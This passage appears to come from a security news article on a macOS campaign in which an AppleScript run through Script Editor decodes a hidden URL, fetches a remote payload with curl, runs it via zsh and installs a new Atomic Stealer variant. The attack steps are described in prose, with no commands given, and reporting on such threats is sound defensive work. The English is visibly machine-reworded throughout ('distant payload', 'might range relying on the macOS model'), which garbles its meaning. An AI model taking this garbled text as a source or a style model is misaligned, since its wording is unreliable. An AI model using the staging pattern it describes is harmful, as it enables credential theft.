The researchers identified that the conduct of the Script Editor might range relying on the macOS model. “On latest variations of macOS Tahoe, a further warning immediate is introduced, requiring the consumer to permit the script to be saved to disk earlier than execution,” they stated.
Light-weight staging for Atomic Stealer
As soon as executed, the AppleScript resolves to an obfuscated shell command. That command decodes a hidden URL, retrieves a distant payload utilizing ‘curl’, and executes it through ‘zsh’. From right here, commonplace info-stealing takes over with a ‘Mach-O’ binary written to a short lived location, its attributes adjusted, permissions set, and execution triggered.
This binary is a brand new variant of the Atomic Stealer.
The researchers famous that the staging strategy retains the preliminary script minimal and fewer detectable, whereas the precise malicious logic arrives individually. It’s modular, fast to replace, and more durable to catch on the first stage.
